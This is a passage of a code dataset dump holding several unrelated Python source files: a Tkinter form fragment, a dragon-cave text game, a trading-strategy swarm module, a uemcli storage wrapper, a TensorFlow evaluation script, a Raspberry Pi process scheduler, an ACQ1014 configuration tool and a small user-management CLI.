self.phoneNumberEntry.grid(row=4,column=1, padx=(20, 0), pady=10)\n\n #Message\n self.messageLabel = Label(self.aboutInformationEntriesFrame, text=\"Message: \", background=\"white\", font=\"bold\")\n self.messageLabel.grid(row=5,column=0, sticky=W)\n self.messageEntry = Text(self.aboutInformationEntriesFrame, height = 10, width=60, bd=1, relief=\"groove\")\n self.messageEntry.grid(row=5,column=1, padx=(20, 0), pady=10)\n\n #Send Button\n self.sendButton= Button(self.aboutInformationFrame, width=20, text = \"SEND\", background=\"white\", font=\"bold\" ,command = lambda: saveButtonClick())\n self.sendButton.pack(side=BOTTOM, padx=(20), pady=(30))\n\n displayContactUs()\n\n\n\n\n\n","sub_path":"desktopApp/parent/frontEnd/parentPortal/pages/contactUs.py","file_name":"contactUs.py","file_ext":"py","file_size_in_byte":4890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"333265385","text":"#The player decides between two caves, which hold either treasure or certain doom.\r\n\r\nimport random\r\nimport time\r\n\r\ndef introduction():\r\n\tprint('''Welcome Player.\r\n\tWould you like to play a game? (yes or no)''')\r\n\t\r\n\tdecision = input('> ')\r\n\t\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tif decision.lower() == 'no' or decision.lower() == 'n':\r\n\t\t\t\tprint('good-bye')\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tstart()\r\n\t\texcept ValueError:\r\n\t\t\tprint('Sorry player, didn\\'t understand your input.\\nPlease type again.')\r\n\t\t\tcontinue\r\n\t\telse:\r\n\t\t\tbreak\r\n\r\ndef start():\r\n\tprint('''You are in a land full of dragons. In front of you,\r\n\tyou see two caves. In one cave, the dragon is friendly\r\n\tand will share his treasure with you. The other dragon\r\n\tis greedy and hungry, and will eat you on sight.\r\n\tWhich cave will you go into? (1 or 2)''')\r\n\tcaves()\r\n\t\r\ndef caves():\r\n\tcaveNumber = input('> ')\r\n\t\r\n\tif caveNumber.lower() == '1':\r\n\t\tfirst_path()\r\n\telif caveNumber.lower() == '2':\r\n\t\tsecond_path()\r\n\telse:\r\n\t\tprint(\"Try that again.\")\r\n\t\tcaves()\r\n\r\ndef first_path():\r\n\tprint('''You approach the cave...\r\n\tIt is dark and spooky...\r\n\tA large dragon jumps out in front of you! He opens his jaws and...''')\r\n\ttime.sleep(2)\r\n\tprint('''Gobbles you down in one bite!\r\n\tDo you want to play again? (yes or no)''')\r\n\tplay_again()\r\n\t\r\n\r\ndef second_path():\r\n\tprint('''You approach the cave...\r\n\tIt is dark and spooky...\r\n\tThe cave goes on... \r\n\tYou find a Torch on the wall and light it.''')\r\n\ttime.sleep(2)\r\n\tprint('''The light brightens the room and so see nothing but gold piled in the cave.\r\n\tDo you want to play again? (yes or no)''')\r\n\tplay_again()\r\n\r\n\t\t\r\ndef play_again():\r\n\tchoice = input('> ')\r\n\tif choice.lower() == 'yes':\r\n\t\tstart()\r\n\telif choice.lower() == 'no':\r\n\t\tprint(\"good-bye\")\r\n\telse:\r\n\t\tprint(\"sorry, what was that?\")\r\n\t\tplay_again()\r\n\t\t\r\n\r\nintroduction()\r\n\t\t","sub_path":"02_DragonRealm/dragon_realm.py","file_name":"dragon_realm.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194090102","text":"\nimport decisionModule\nimport numpy as np\nimport utilities\nimport basic\nimport random\nimport switchModule\nimport populationModule\n\n##KEEPS TRACK OF BEST KNOWN PARAMETERS FOR EVERY TECHNICAL MODULE\nclass SwarmModule:\n\n ##RETURNED BY DECISION MODULE DESCRIBE\n #(indicator, activationValue, timePeriod, lowerValue, higherValue), lowerAction, higherAction\n def __init__(self):\n self.bestDecisionModules = {}\n self.bestJunctionModules = {}\n self.bestActivationModules = {}\n self.bestSwitchModules = {}\n self.indicatorStats = {}\n\n def recordDecisionModule(self, organismTuple):\n organism = organismTuple[0]\n\n indicator, activationValue, timePeriod, lowerValue, higherValue = organism.describe()[0]\n dataSource = organism.describe()[3]\n if dataSource not in self.bestDecisionModules:\n self.bestDecisionModules[dataSource] = {}\n if str(indicator) not in self.bestDecisionModules[dataSource]:\n self.bestDecisionModules[dataSource][str(indicator)] = {}\n if organism.getInactiveDecision() not in self.bestDecisionModules[dataSource][str(indicator)]:\n self.bestDecisionModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n\n self.bestDecisionModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, organism.describe()[1], organism.describe()[2])] = {\"run\":organismTuple[1], \"organism\":organism.constructCopy()}\n\n def recordJunctionModule(self, organismTuple): ##KEEP TRACK OF BEST JUNCTIONS BY DEPTH\n organism = organismTuple[0]\n depth = organismTuple[0].countModuleComponents()\n if str(depth) not in self.bestJunctionModules:\n self.bestJunctionModules[str(depth)] = {}\n if organism.getInactiveDecision() not in self.bestJunctionModules[str(depth)]:\n self.bestJunctionModules[str(depth)][organism.getInactiveDecision()] = {}\n self.bestJunctionModules[str(depth)][organism.getInactiveDecision()][str(organism.describe())] = {\"run\":organismTuple[1], \"organism\":organism.constructCopy()}\n\n def recordActivationModule(self, organismTuple): ##PARSE JUNCTION TREE FOR ACTIVATION FUNCTIONS\n organism = organismTuple[0]\n module1, module2 = organism.returnModules()\n for mod in [module1, module2]:\n if mod.objectType() == basic.BasicTrader.ACTIVATIONMOD:\n indicator, activationValue, timePeriod, lowerValue, higherValue = mod.describe()[0]\n dataSource = mod.describe()[3]\n if dataSource not in self.bestActivationModules:\n self.bestActivationModules[dataSource] = {}\n\n if str(indicator) not in self.bestActivationModules[dataSource]:\n self.bestActivationModules[dataSource][str(indicator)] = {}\n\n if organism.getInactiveDecision() not in self.bestActivationModules[dataSource][str(indicator)]:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n\n if (timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2]) in self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()]:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2])][\"runs\"] += [organismTuple[1]]\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2])][\"organisms\"] += [mod.constructCopy()]\n else:\n self.bestActivationModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, mod.describe()[1], mod.describe()[2])] = {\"runs\":[organismTuple[1]], \"organisms\":[mod.constructCopy()]}\n\n ##DONT CALL RECURSIVELY BECAUSE CARE ABOUT CASE WHERE ACTIVATION IS NEAREST TOP OF TREE\n # elif mod.objectType() == basic.BasicTrader.JUNCTIONMOD:\n # ##CALL RECURSIVELY\n # self.recordActivationModule((mod, organismTuple[1])) ##ASSIGN SCORE OF ENTIRE JUNCTION\n\n def recordSwitchModule(self, organismTuple):\n organism = organismTuple[0]\n switchMethod = organism.returnJunctionMethod()\n if switchMethod.isSimple() == False: #NOT 'AND' or 'OR'\n # self.currentAction, self.technicalModule.describe(), self.lowerAction, self.higherAction\n indicator, activationValue, timePeriod, lowerValue, higherValue = switchMethod.describe()[1]\n dataSource = switchMethod.describe()[4]\n if dataSource not in self.bestSwitchModules:\n self.bestSwitchModules[dataSource] = {}\n\n if str(indicator) not in self.bestSwitchModules[dataSource]:\n self.bestSwitchModules[dataSource][str(indicator)] = {}\n\n if organism.getInactiveDecision() not in self.bestSwitchModules[dataSource][str(indicator)]:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()] = {}\n if (timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3]) in self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()]:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])][\"runs\"] += [organismTuple[1]]\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])][\"organisms\"] += [switchMethod.constructCopy()]\n else:\n self.bestSwitchModules[dataSource][str(indicator)][organism.getInactiveDecision()][(timePeriod, lowerValue, higherValue, switchMethod.describe()[2], switchMethod.describe()[3])] = {\"runs\":[organismTuple[1]], \"organisms\":[switchMethod.constructCopy()]}\n\n\n def getBestStatsForEachIndicator(self):\n raise NotImplementedError\n\n def getDecisionModuleStats(self):\n toReturn = {}\n for dataSource in self.bestDecisionModules:\n toReturn[dataSource] = {}\n for indicator in self.bestDecisionModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestDecisionModules[dataSource][indicator]:\n allScores = []\n for parameterSetting in self.bestDecisionModules[dataSource][indicator][inactiveTendency]:\n allScores.append(self.bestDecisionModules[dataSource][indicator][inactiveTendency][parameterSetting][\"run\"].getReturnDifference())\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestDecisionModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestDecisionModules or str(indicator) not in self.bestDecisionModules[dataSource] or inactiveTendency not in self.bestDecisionModules[dataSource][str(indicator)]:\n return {}\n\n\n for params in self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency]:\n valuesToChooseFrom[params] = (self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency][params][\"run\"]).getReturnDifference()\n\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = valuesToChooseFrom[params]\n\n return toReturn\n\n def getDecision(self, dataSource, indicator, inactiveTendency, params):\n return self.bestDecisionModules[dataSource][str(indicator)][inactiveTendency][params][\"organism\"]\n\n def getJunctionModuleStats(self):\n toReturn = {}\n for depth in self.bestJunctionModules:\n toReturn[depth] = {}\n for inactiveTendency in self.bestJunctionModules[depth]:\n allScores = []\n for junction in self.bestJunctionModules[depth][inactiveTendency]:\n allScores.append(self.bestJunctionModules[depth][inactiveTendency][junction][\"run\"].getReturnDifference())\n if len(allScores) > 0:\n toReturn[depth][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestJunctionByDepth(self, depth, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if str(depth) not in self.bestJunctionModules or inactiveTendency not in self.bestJunctionModules[str(depth)]:\n return {}\n\n for junction in self.bestJunctionModules[str(depth)][inactiveTendency]:\n valuesToChooseFrom[junction] = (self.bestJunctionModules[str(depth)][inactiveTendency][junction][\"run\"]).getReturnDifference()\n toReturn = {}\n for junction in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[junction] = valuesToChooseFrom[junction]\n\n return toReturn\n\n def getJunction(self, depth, inactiveTendency, junctionDescription):\n return self.bestJunctionModules[str(depth)][inactiveTendency][junctionDescription][\"organism\"]\n\n def getBestActivationModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestActivationModules or str(indicator) not in self.bestActivationModules[dataSource] or inactiveTendency not in self.bestActivationModules[dataSource][str(indicator)]:\n return {}\n\n for params in self.bestActivationModules[dataSource][str(indicator)][inactiveTendency]:\n scores = utilities.removeInf([score.getReturnDifference() for score in self.bestActivationModules[dataSource][str(indicator)][inactiveTendency][params][\"runs\"]])\n if len(scores) > 2:\n valuesToChooseFrom[params] = utilities.meanOfList(scores)\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = valuesToChooseFrom[params]\n return toReturn\n\n def getActivationModuleStats(self):\n toReturn = {}\n for dataSource in self.bestActivationModules:\n toReturn[dataSource] = {}\n for indicator in self.bestActivationModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestActivationModules[dataSource][indicator]:\n\n allScores = []\n for params in self.bestActivationModules[dataSource][indicator][inactiveTendency]:\n allScores += utilities.removeInf([score.getReturnDifference() for score in self.bestActivationModules[dataSource][indicator][inactiveTendency][params][\"runs\"]])\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n\n def getActivation(self, dataSource, indicator, inactiveTendency, params):\n allActivationOrganisms = self.bestActivationModules[dataSource][str(indicator)][inactiveTendency][params][\"organisms\"]\n return allActivationOrganisms[random.randint(0,len(allActivationOrganisms) - 1)]\n\n def getSwitchModuleStats(self):\n toReturn = {}\n for dataSource in self.bestSwitchModules:\n toReturn[dataSource] = {}\n for indicator in self.bestSwitchModules[dataSource]:\n toReturn[dataSource][indicator] = {}\n for inactiveTendency in self.bestSwitchModules[dataSource][indicator]:\n allScores = []\n for params in self.bestSwitchModules[dataSource][indicator][inactiveTendency]:\n allScores += utilities.removeInf([score.getReturnDifference() for score in self.bestSwitchModules[dataSource][indicator][inactiveTendency][params][\"runs\"]])\n if len(allScores) > 0:\n toReturn[dataSource][indicator][inactiveTendency] = np.percentile(np.array(allScores), 75)\n return toReturn\n\n def getBestSwitchModuleForIndicator(self, dataSource, indicator, inactiveTendency, topX):\n valuesToChooseFrom = {}\n\n if dataSource not in self.bestSwitchModules or str(indicator) not in self.bestSwitchModules[dataSource] or inactiveTendency not in self.bestSwitchModules[dataSource][str(indicator)]:\n return {}\n\n for params in self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency]:\n scores = utilities.removeInf([score.getReturnDifference() for score in self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency][params][\"runs\"]])\n if len(scores) > 2:\n valuesToChooseFrom[params] = utilities.meanOfList(scores)\n toReturn = {}\n for params in sorted(valuesToChooseFrom, key=valuesToChooseFrom.get)[-topX:]: #WILL RETURN TOPX BEST PARAMS\n toReturn[params] = valuesToChooseFrom[params]\n return toReturn\n\n def getSwitch(self, dataSource, indicator, inactiveTendency, params):\n allActivationOrganisms = self.bestSwitchModules[dataSource][str(indicator)][inactiveTendency][params][\"organisms\"]\n return allActivationOrganisms[random.randint(0,len(allActivationOrganisms) - 1)]\n","sub_path":"swarmModule.py","file_name":"swarmModule.py","file_ext":"py","file_size_in_byte":13774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"199798111","text":"from concurrent.futures import ThreadPoolExecutor\nimport subprocess\nimport re\nfrom logbook import Logger, StreamHandler, FileHandler\nimport sys\n\n'''\n记录日志到文件和STDOUT\n'''\n\nStreamHandler(sys.stdout, level='DEBUG').push_application()\nFileHandler('app.log', bubble=True, level='INFO').push_application()\n\nlog = Logger('uemcli')\n\nclass Device:\n def __init__(self, ip, username='admin', password='Password123!', cmd_base='echo'):\n self.ip = ip\n self.username = username\n self.password = password\n self.components = []\n self.cmd_head = f'{cmd_base} {username} -p {password} -d {ip}'\n\n def refresh_components(self, obj_str):\n component_list = []\n for item in Device.parse_result(self._run_cmd(f\"{self.cmd_head} {obj_str} show -output csv -detail\")):\n obj = Component(obj_str,item)\n component_list.append(obj)\n self.components = component_list\n return self\n\n def __repr__(self):\n return self.ip\n\n def _run_cmd(self, cmd_str):\n log.info(f'start {cmd_str}')\n # import time\n # import random\n # time.sleep(random.randint(3,10))\n p = subprocess.Popen(cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdoutput, erroutput = p.communicate()\n if p.returncode:\n log.error('error:\\n' + erroutput.decode(encoding='utf-16le'))\n else:\n log.info('out:\\n' + stdoutput.decode(encoding='utf-16le'))\n res = {'return_code': p.returncode,\n 'output': stdoutput.decode(encoding='utf-16le'),\n 'error': erroutput.decode(encoding='utf-16le')}\n return res\n\n def uemcli_one(self,cmd_str):\n res = self._run_cmd(f'{self.cmd_head} {cmd_str}')\n if res['return_code']:\n raise BaseException(res['error'])\n else:\n return res['output']\n\n def uemcli_group(self, cmd_str, args=[]):\n cmds = [f'{self.cmd_head} {cmd_str(it)}' for it in args]\n with ThreadPoolExecutor(max_workers=5) as executor:\n results = executor.map(self._run_cmd, cmds)\n return results\n\n @staticmethod\n def parse_result(result):\n lines = result['output'].split('\\n')\n lines[0]=re.sub('\\ufeff','',lines[0])\n keys = lines[0].split(',')\n keys = [eval(key) for key in keys]\n dict_list = []\n for line in lines[1:]:\n if line:\n values = line.split('\",\"')\n temp_dict = dict(zip(keys, values))\n dict_list.append(temp_dict)\n return dict_list\n\n def set_property(self, property_str):\n temp_f = lambda x: f'{self.cmd_head} {x.component_str} set id={x.properties[\"TTY\"]} {property_str}'\n self.uemcli_group(temp_f, self.components)\n\n def component_filter(self, criteria):\n import copy\n obj = copy.deepcopy(self)\n obj.components = filter(criteria, obj.components)\n return obj\n\n def greater_than(self, age):\n return self.component_filter(lambda x: x.properties['age'] > age)\n\n def filter_match(self, property, regexp):\n return self.component_filter(lambda x: re.search(regexp, x.properties[property], re.IGNORECASE))\n\n def filter_not_match(self, property, regexp):\n return self.component_filter(lambda x: not re.search(regexp, x.properties[property], re.IGNORECASE))\n\n def filter_equal(self, property, value):\n return self.component_filter(lambda x: x.properties[property] == str(value))\n\n def filter_not_equal(self, property, value):\n return self.component_filter(lambda x: x.properties[property] != str(value))\n\n\nclass Component:\n def __init__(self, component_str, properties_dict):\n self.component_str = component_str\n self.properties = properties_dict\n\n def __repr__(self):\n return f\"{self.component_str} {self.properties['Name']} \"\n\n\nif __name__ == \"__main__\":\n dev1 = Device('10.229.20.171',cmd_base='uemcli -sslPolicy accept -noHeader -u')\n log.info(dev1)\n component_str = '/stor/prov/fs'\n # dev1.refresh_components(component_str)\n for it in dev1.refresh_components(component_str).filter_match('Name','Reid_FS_FLR').components:\n log.info(it)\n log.info(it.properties['Health state'])\n log.info(it.properties['Health details'])\n\n","sub_path":"uemcli/pute.py","file_name":"pute.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"502740910","text":"# ==================================================\n# Load and test a trained model on Traing Set.\n# ==================================================\nimport tensorflow as tf\nimport numpy as np\nimport preprocess\nfrom model import GRUModel\nfrom tensorflow.contrib import learn\n\nfrom config import *\n\nprint(\"Restoring Vocab...\")\ntest_data = preprocess.train_data(dataset)\nc = [y for x in test_data[2] for y in x]\nmax_len = max([len(x) for x in c])\nvocab = learn.preprocessing.VocabularyProcessor(max_len)\nvocab.fit(c)\n\n# 1/10 for testing\nidx = np.random.randint(len(test_data[0]), size=int(len(test_data[0])/10))\nqq, ll, cc, aa = zip(*[[test_data[0][i], test_data[1][i], test_data[2][i], test_data[3][i]] for i in idx])\n\ntruths = aa\n\nprint(\"Converting text to data...\")\ntrain_q = preprocess.build_vocab(qq, vocab)\ntrain_c = [preprocess.build_vocab(x, vocab) for x in cc]\ntrain_l = [preprocess.build_vocab(x, vocab) for x in ll]\ntrain_a = [train_l[i][x-1] for i, x in enumerate(aa)]\n\ndef generate_dataset():\n result = []\n for i, c in enumerate(train_c):\n r = train_a[i]\n q = train_q[i]\n chioces = train_l[i]\n for w in train_l[i]:\n if (r == w).all():\n continue\n result.append([c, q, r, w, truths[i]])\n return [[y, x[1], x[2], x[3], x[0], chioces, x[4]] for x in result for y in x[0]]\n\ntest_data = generate_dataset()\nidx = np.random.randint(len(test_data), size=len(qq))\ntest_data = [test_data[i] for i in idx]\nic, iq, ir, iw, ic_sents, chioces, truths = zip(*test_data)\n\nprint(\" [*] Max sentence length: {:d}\".format(max_len))\nprint(\" [*] Vocabulary Size: {:d}\".format(len(vocab.vocabulary_)))\nprint(\" [*] Test Question Size: {:d}\".format(len(test_data)))\n\n# ==================================================\nprint(\"Restoring Model...\")\ninput_c = tf.placeholder(tf.float32, [None, 1, max_len], name=\"ic\")\ninput_q = tf.placeholder(tf.float32, [None, 1, max_len], name=\"iq\")\ninput_r = tf.placeholder(tf.float32, [None, 1, max_len], name=\"ir\")\ninput_w = tf.placeholder(tf.float32, [None, 1, max_len], name=\"iw\")\nstate = tf.placeholder(tf.float32, [None, max_len], name=\"state\")\ndropout = tf.placeholder(tf.float32, name=\"dropout\")\n\nzero_input = [np.random.randn(1, max_len) for _ in range(batch_size)]\nzero_state = [np.random.randn(max_len) for _ in range(batch_size)]\ncosts = []\n\nsess = tf.Session()\nmodel = GRUModel(input_c, input_q, input_r, input_w, state, dropout, num_hidden=max_len)\nmodel.load(sess, save_dir='save', dataset=dataset)\n\n# ==================================================\ndef encode(c_batch, q_batch):\n def merge(article, question):\n prev = zero_state\n for sent in article:\n prev = sess.run(model.prediction, {\n input_c: [sent],\n input_q: [question],\n input_r: zero_input, input_w: zero_input, state: prev, dropout: 0})\n return prev\n assert len(c_batch) == len(q_batch), \"Must input same bacth size of context and question\"\n encode_batch = [merge(c, q) for c, q in zip(c_batch, q_batch)]\n return encode_batch\n\n# ==================================================\nnum_correct = 0\n\nprint(\"Running Model...\")\nfor epoch in range(len(test_data)):\n# for epoch in range(1):\n\n idx = np.random.randint(len(test_data))\n # generate batches\n batch_iq = [[iq[idx]]] * batch_size\n batch_ir = [[ir[idx]]] * batch_size\n batch_iw = [[iw[idx]]] * batch_size\n # batch_answers\n answers = chioces[idx]\n batch_ans1 = [[answers[0]]] * batch_size\n batch_ans2 = [[answers[1]]] * batch_size\n batch_ans3 = [[answers[2]]] * batch_size\n batch_ans4 = [[answers[3]]] * batch_size\n # batch_context\n c_batch = [ic_sents[idx]] * batch_size\n c_batch = [[[y] for y in x] for x in c_batch]\n # encode context & question for all context sentences\n batch_enc = encode(c_batch, batch_iq)\n\n # evaluate on training data\n error = sess.run(model.cosine_cost, {\n input_c: zero_input, input_q: zero_input, input_r: batch_ir, input_w: batch_iw, state: batch_enc[0], dropout: 1})\n costs.append(error)\n # evaluate chioces\n sims = []\n for x in (batch_ans1, batch_ans2, batch_ans3, batch_ans4):\n sims.append(sess.run(model.cosine_cost, {\n input_c: zero_input, input_q: zero_input, input_r: x, input_w: x, state: batch_enc[0], dropout: 1}))\n best_ans = sims.index(min(sims))\n true_ans = truths[idx]\n if best_ans == int(true_ans):\n num_correct += 1\n print('Question {:3d} cosine cost: {:2.5f}, mean cost: {:2.5f}. guess: {:d}, true: {:d}, correct rate: {:3.1f}%'.format(\n epoch + 1, error, sum(costs) / len(costs), best_ans, true_ans, num_correct / (epoch + 1) * 100))\n print('Sims: {:3.5f} {:3.5f} {:3.5f} {:3.5f}'.format(sims[0], sims[1], sims[2], sims[3]))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"19126549","text":"#!/usr/bin/env python\nimport time\nimport datetime\nimport os\nimport subprocess\nprint(\"Starting PySched\")\n\n#path1='/home/pi/git_repo/add_temp'\npath2='/home/pi/git_repo/python/drive_headless.py'\npath3='/home/pi/git_repo/arianna/weather.py'\n#path1='/home/pi/git_repo/sched/test_cont.py'\n#path2='/home/pi/git_repo/sched/test_int.py'\n\nlog=open('log','a+')\n\ndef error(message):\n\tfe=open('error_log','a+')\n\tfe.write(str(datetime.datetime.now())+\"\\t\"+message+\"\\n\")\n\tfe.close()\n\nclass Proc(object):\n\tglobal log\n\tdef __init__(self,_file,_mode):\n\t\tself.filename=_file\n\t\tself.mode=_mode\n\t\tself.process=self.start()\n\t\tself.last_start_time=time.localtime()\n\t\n\tdef start(self):\n\t\treturn subprocess.Popen([self.filename],stdout=log)\n\n\tdef print_status(self):\n\t\tprint(\"PID(\"+self.filename+\"): \"+str(self.process.pid))\n\n\tdef check(self):\n\t\tself.process.poll()\n\t\n\t\t#if mode is 0, always running, if there is exit status, then restart\n\t\tif self.mode==0:\n\t\t\t#print(\"Return Code: \"+str(self.process.returncode))\n\t\t\tif str(self.process.returncode) !='None':\n\t\t\t\terror(\"Restarting\"+self.filename+\" Exit Code: \"+str(self.process.returncode))\n\t\t\t\temail='echo \"'\n\t\t\t\temail+=\"Restarting:\"+self.filename+\"Exit Code: \"+str(self.process.returncode)\n\t\t\t\temail+='\" | ssmtp 5419905349@vtext.com'\n\t\t\t\tprint(email)\n\t\t\t\tos.system(email)\n\t\t\t\tself.process=self.start()\n\t\tself.process.poll()\n\tdef kill(self):\n\t\tif str(self.process.returncode) =='None':\n\t\t\tself.process.kill()\n\n\nerror(\"Starting Sched\")\np={Proc(path2,0),Proc(path3,0)}\n#p={Proc(path1,0)}\nx=0\nwhile True:\n\ttry:\n\t\tfor s in p:\n\t\t\ts.print_status()\n\t\t\tprint(\"\\n\")\n\t\t\ts.check()\n\t\t\t#if x==3:\n\t\t\t#\tprint(\"Killing all\")\n\t\t\t#\ts.process.kill()\n\t\ttime.sleep(5)\n\t\tx=x+1\n\texcept:\n\t\tfor s in p:\n\t\t\ts.kill()\n\nfor s in p:\n\ts.kill()\nprint(\"Exit PySched\")\n","sub_path":"pysched.py","file_name":"pysched.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"414994675","text":"#!/usr/bin/env python\n\n\"\"\" configure transient \n acq1014_configure_transient UUT1 UUT2 [NPOST] [trigger=int|ext|ext2]\n\"\"\"\n\nimport sys\nimport acq400_hapi\nimport argparse\nimport sets\n\ndef intSI(x):\n x = str(x)\n units = x.find('M')\n if units >= 0:\n return int(x[0:units])*1000000\n else:\n units = x.find('k')\n if units >= 0:\n return int(x[0:units])*1000\n else:\n return int(x)\n\n\n\ndef configure_shot(args):\n if len(args.uuts)%2:\n print(\"ERROR: must be an even number of uuts, minimum 2\")\n sys.exit(1)\n\n uuts = [acq400_hapi.Acq400(u) for u in args.uuts] \n mset = sets.Set(uuts[0:2])\n pre = intSI(args.pre)\n post = intSI(args.post)\n t_args = [args.trg.split(' ')[0], \n \"prepost\" if pre>0 else \"post\", \n \"falling\" if \"falling\" in args.trg else \"rising\"] \n c_args = args.clk.split(' ')\n if len(c_args) > 1:\n c_args[1] = intSI(c_args[1])\n if len(c_args) > 2:\n c_args[2] = intSI(c_args[2])\n c_args = [str(x) for x in c_args]\n\n for u in uuts:\n print(\"uut:%s\" % u.uut)\n u.s0.trace = 1\n u.s0.set_abort = 1;\n u.s0.transient = \"PRE=%d POST=%d SOFT_TRIGGER=0\" % (pre, post)\n\n u.s0.acq1014_select_trg_src = ' '.join(t_args)\n u.s0.acq1014_select_clk_src = ' '.join(c_args)\n\n u.s0.trace = 0\n\ndef run_main():\n parser = argparse.ArgumentParser(description='configure multiple acq1014')\n parser.add_argument('--pre', default=0, help=\"pre trigger length\")\n parser.add_argument('--post', default=100000, help=\"post trigger length\")\n parser.add_argument('--clk', default=\"int 80000000\", help='clk \"int|ext SR [CR]\"')\n parser.add_argument('--trg', default=\"int\", help='trg \"int|ext rising|falling\"')\n parser.add_argument('uuts', nargs='*', help=\"uut pairs: m1,m2 [s1,s2 ...]\")\n configure_shot(parser.parse_args())\n\n\n# execution starts here\n\nif __name__ == '__main__':\n run_main()\n\n","sub_path":"Source Code/Python API/acq1014_configure_transient.py","file_name":"acq1014_configure_transient.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"480412079","text":"#enconding: utf-8\n\nusers = { }\n\ntpl_title = '|{0:^10s}|{1:^10s}|{2:^5s}|{3:^15s}|'\ncolums_title = ('id','name','age','tel')\n\ntpl_body = '|{uid:^10d}|{name:^10s}|{age:^5d}|{tel:^15s}|'\n\ntitle = tpl_title.format(colums_title[0],colums_title[1],colums_title[2],colums_title[3])\nsplitline = '-' * len(title)\n\nwhile True:\n operate = input('请输入操作(add/delete/update/find/list/exit):')\n if operate == 'add':\n text = input('请输入用户信息:')\n nodes = text.split(',')\n if len(nodes) !=3:\n print('输入信息有误')\n else:\n if not nodes[1].isdigit():\n print('年龄有误')\n else:\n uid = 1\n if users:\n uid = max(users) + 1\n users[uid] = {'name':nodes[0],'age':int(nodes[1]),'tel':nodes[2]}\n print('添加成功')\n elif operate == 'delete':\n uid = input('请输入删除的用户ID:')\n if not uid.isdigit():\n print('输入信息有误')\n else:\n user = users.pop(int(uid),None)\n if user:\n print('删除成功')\n else:\n print('删除失败')\n elif operate == 'update':\n uid = input('请输入要修改的用户ID:')\n if not uid.isdigit() or int(uid) not in users:\n print('输入信息有误')\n else:\n text = input('请输入用户信息(不能改名字):')\n nodes = text.split(',')\n if len(nodes) !=2:\n print('输入信息有误')\n else:\n if not nodes[0].isdigit():\n print('年龄有误')\n else:\n uid = int(uid)\n users[uid]['age'] = nodes[0]\n users[uid]['tel'] = nodes[1]\n\n users[uid] = {'name':users[uid]['name'],'age':int(nodes[0]),'tel':nodes[1]}\n print('更改成功')\n elif operate == 'list':\n print(splitline)\n print(title)\n print(splitline)\n for key,value in users.items():\n print(tpl_body.format(uid=key,name=value['name'],age=value['age'],tel=value['tel']))\n print(splitline)\n elif operate == 'find':\n text = input('请输入查找的字符串:')\n for key,value in users.items():\n if text in value['name']:\n print(tpl_body.format(uid=key,name=value['name'],age=value['age'],tel=value['tel']))\n elif operate == 'exit':\n break","sub_path":"practice/prac1/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
